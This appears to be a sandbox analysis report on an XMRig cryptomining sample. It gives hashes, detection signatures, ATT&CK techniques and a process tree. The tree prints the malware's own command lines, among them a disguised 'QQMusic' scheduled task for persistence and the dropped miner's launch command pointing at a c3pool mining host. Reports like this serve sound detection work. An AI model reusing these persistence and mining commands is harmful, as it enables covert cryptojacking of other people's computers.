Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
-
submitted
14/06/2024, 11:48
General
-
Target
1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe
-
Size
9.0MB
-
MD5
6b4f06f6c6c73a1d56c5a66be8306541
-
SHA1
2af7e6175abe6f102520b61a92e03990c80cc2f4
-
SHA256
1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8
-
SHA512
fda4c6bde698c62c66f6e8023f1cdd84b7fca99c19f8c02882045d19ba983e7a9a0223f6ffbebbe2d8ffb363b02f437f550413cb16bdff110d4da3e09e0b0ed2
-
SSDEEP
196608:rhHMBGC3PtXtT+Was8+wq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G0vwuwasMdJOnZKVSaaNZOn
Score
10/10
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 25 IoCs
-
Executes dropped EXE 25 IoCs
-
UPX packed file 28 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 14 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 59 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe"C:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe"1⤵
- Adds Run key to start application
- Enumerates connected drives
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe /F3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\SMB.exeC:\ProgramData\SMB.exe2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exeC:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe1⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.1MB
MD57b2f170698522cd844e0423252ad36c1
SHA1303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5
SHA2565214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994
SHA5127155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa
-
Filesize
85KB
MD5c7fad963ad8e46e773dc5ee9177ab218
SHA192a68b223b2d2e501c1f0123fabf63e15fff4d11
SHA2567417daf85e6215dedfd85ca8bfafcfd643c8afe0debcf983ad4bacdb4d1a6dbc
SHA512efd3511ddf487e08515ff301fd8d521060f37ad8035e0c19fb5d9c730df444ced918596f54994d9d090c889a79ba3d431f96ae4fc942b0c4a8aa0c145a05419c
-
Filesize
71KB
MD5900c175024c7aa58aab0c62897e2471a
SHA1fc51f654aa35576b5421869ba621effe73bf1c46
SHA256de23da87e7fbecb2eaccbb85eeff465250dbca7c0aba01a2766761e0538f90b6
SHA51245ed21b83987a0a5e4320d06cabf8534aa04dfb0a5f7ff1d9df6ae247f7b813a9a5c8d36edb2132e07ef3f5b0eb49ac1757328ca73ae95d894b7eb23abd591e9
-
Filesize
1.3MB
MD523d84a7ed2e8e76d0a13197b74913654
SHA123d04ba674bafbad225243dc81ce7eccd744a35a
SHA256ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301
SHA512aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c
-
Filesize
9.0MB
MD56b4f06f6c6c73a1d56c5a66be8306541
SHA12af7e6175abe6f102520b61a92e03990c80cc2f4
SHA2561172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8
SHA512fda4c6bde698c62c66f6e8023f1cdd84b7fca99c19f8c02882045d19ba983e7a9a0223f6ffbebbe2d8ffb363b02f437f550413cb16bdff110d4da3e09e0b0ed2
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
80KB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB